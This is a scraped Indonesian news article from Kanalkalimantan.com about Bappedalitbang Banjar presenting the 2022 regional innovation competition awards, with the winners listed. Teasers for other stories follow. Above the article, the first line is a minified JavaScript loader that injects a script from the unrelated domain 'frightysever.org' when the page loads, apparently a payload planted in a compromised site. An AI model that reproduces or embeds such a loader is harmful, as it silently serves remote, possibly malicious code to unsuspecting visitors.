(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Bappedalitbang Banjar

Bappedalitbang Banjar Serahkan Penghargaan Lomba Inovasi Daerah 2022


KANALKALIMANTAN.COM, MARTAPURA – Puncak peringatan Hari Jadi Ke-72 Kabupaten Banjar yang dirayakan Rabu (24/8/2022) sekaligus menjadi moment penyerahan piagam dan piala Lomba Inovasi Daerah Kabupaten Banjar Tahun 2022.

Ditandai penyerahan secara simbolis oleh Bupati Banjar H Saidi Mansyur di tengah acara untuk juara 1 kategori ASN dan masyarakat/umum kemudian dilanjutkan dengan penyerahan juara bagi lainnya di aula Baiman oleh Kepala Bappedalitbang HM Riza Dauly dan Koordinator Umum Pusat Inovasi Administrasi Negara PIAN LAN Antun Nastri Sidik.

Dalam sambutan singkatnya Riza sapaan akrab Kepala Bappedalitbang Banjar mengatakan, bupati Banjar menyambut baik dan apresiasi atas Lomba Inovasi Daerah Kabupaten Banjar Tahun 2022 ini.

Karena bupati juga menyukai inovasi khususnya pelayanan sehingga kepada seluruh SKPD diimbau agar selalu berinovasi.

 

Baca juga  : BIN Daerah Kalsel Gelar Vaksinasi Covid-19 di Kuin Selatan

“Bupati juga sangat senang bila SKPD bisa berinovasi dengan biaya yang murah atau low baudget, karena bagi beliau beinovasi tidak harus menggunakan biaya anggaran yang banyak,” ujar Riza.

Sementara itu Antun Nastri Sidik menyampaikan, agar kedepannya data inovasi berupa proposal, dokumentasi dan video bisa lebih lengkap, sehingga didaftarkan dimanapun akan lebih mudah karena tinggal melengkapi kekurangannya saja.

Diketahui, berdasar hasil penilaian juri yang dilakukan dua tahap, yaitu tahap pertama dinilai oleh juri dari tim inovasi daerah dan tahap kedua oleh Kemendagri RI, LAN RI, Balitbangda dan Akademisi Universitas Lambung Mangkurat (ULM) Provinsi Kalimantan Selatan dengan ketentuan pemenang Kategori ASN Juara I Pakulih Anam dari Dinas Kependudukan dan Pencatatan Sipil.

Kemudian, Juara II Gelang Anting Manis dari Dinas Koperasi, Usaha Mikro, Perindustrian dan Perdagangan, Juara III Bank Sampah (Daur’s) Purna Praja dari Kelurahan Mandarsari.

 

Baca juga  : Lautan Jemaah Bersholawat Bersama Habib Syech Padati Ponpes Raudhatun Nasyi’in

Juara Harapan I diraih Live Suara Banjar dari Dinas Komunikasi, Informatika, Statistik dan Persandian, Harapan II Kaltrap dari Dinas Pertanian dan Inovasi terbanyak untuk Kelurahan Mandarsari.

Selain diberikan piala dan sertifikat penghargaan kepada masing-masing inovator pemenang ASN akan diberikan 30 persen TPP selama 1 bulan.

Kemudian untuk Kategori Masyarakat/Umum, Juara I DEWI (Desa Wisata) SRT dari Desa Sungai Rangas Tengah Kecamatan Martapura Barat, Juara II Rahatan dari Forum Anak Daerah, dan Juara III Deorub dari Desa Tiwingan Lama.

Harapan I Pais Besagu dari Desa Awang Bangkal Barat, Harapan II Sistem Informasi Desa dari Desa Jawa Laut serta Inovasi terbanyak Forum Anak Daerah.

 

Baca juga  : Forum Anak Daerah Tanbu Gelar Acara Roadshow Generasi Cerdas Cakap Digital

Adapun untuk pemenang kategori masyarakat/umum mendapatkan hadiah uang bervariasi berdasakan hasil kemenangan dari total hadiah 30 juta rupiah, hal tersebut guna membangkitkan semangat inovator lain untuk berinovasi.

Acara dihadiri kepala bidang Litbang dan Inovasi, kepala bidang Ekonomi dan Sumber Daya Alam, serta seluruh inovator sebagai penerima penghargaan. (Kanalkalimantan.com/rls/bappedalitbang)

Reporter : rls
Editor : dhani


Desy Arfianty

Recent Posts

Jemaah Haji Asal Tabalong Wafat Jelang Wukuf Arafah

KANALKALIMANTAN.COM, BANJARMASIN - Kabar duka datang dari Kloter 18 Haji Embarkasi Banjarmasin, seorang jemaah haji… Read More

5 jam ago

Harga Daging Sapi Stabil di Pasar Bauntung Banjarbaru, Ayam Ras Naik Capai Rp31 Ribu per Kg

KANALKALIMANTAN.COM, BANJARBARU - Lapak penjual daging sapi di Pasar Bauntung Kota Banjarbaru Kalimantan Selatan (Kalsel)… Read More

9 jam ago

Kerukunan Mahasiswa HSU Banjarmasin Dikukuhkan, Ini Pesan Ketua DPRD HSU

KANALKALIMANTAN.COM, AMUNTAI - Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Hulu Sungai Utara (HSU) selalu memberikan… Read More

10 jam ago

203 Jemaah Sidrap Ditangkap di Jeddah, Pakai Visa Ziarah Bertahan untuk Berhaji

KANALKALIMANTAN.COM, JEDDAH - Tim Pengawas (Timwas) Haji DPR meminta jemaah calon haji Indonesia yang tidak… Read More

12 jam ago

KPU Banjar Launching Pilkada Kabupaten Banjar 2024

KANALKALIMANTAN.COM, MARTAPURA - Komisi Pemilihan Umum (KPU) Kabupaten Banjar meluncurkan Pemilihan Bupati dan Wakil Bupati… Read More

13 jam ago

Bakti Religi Polsek Banjarbaru Utara, Bersihkan Masjid Sambut Hari Bhayangkara ke-78

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Bhayangkara ke-78, jajaran Kepolisian Sektor (Polsek) Banjarbaru Utara melaksanakan kegiatan… Read More

15 jam ago

This website uses cookies.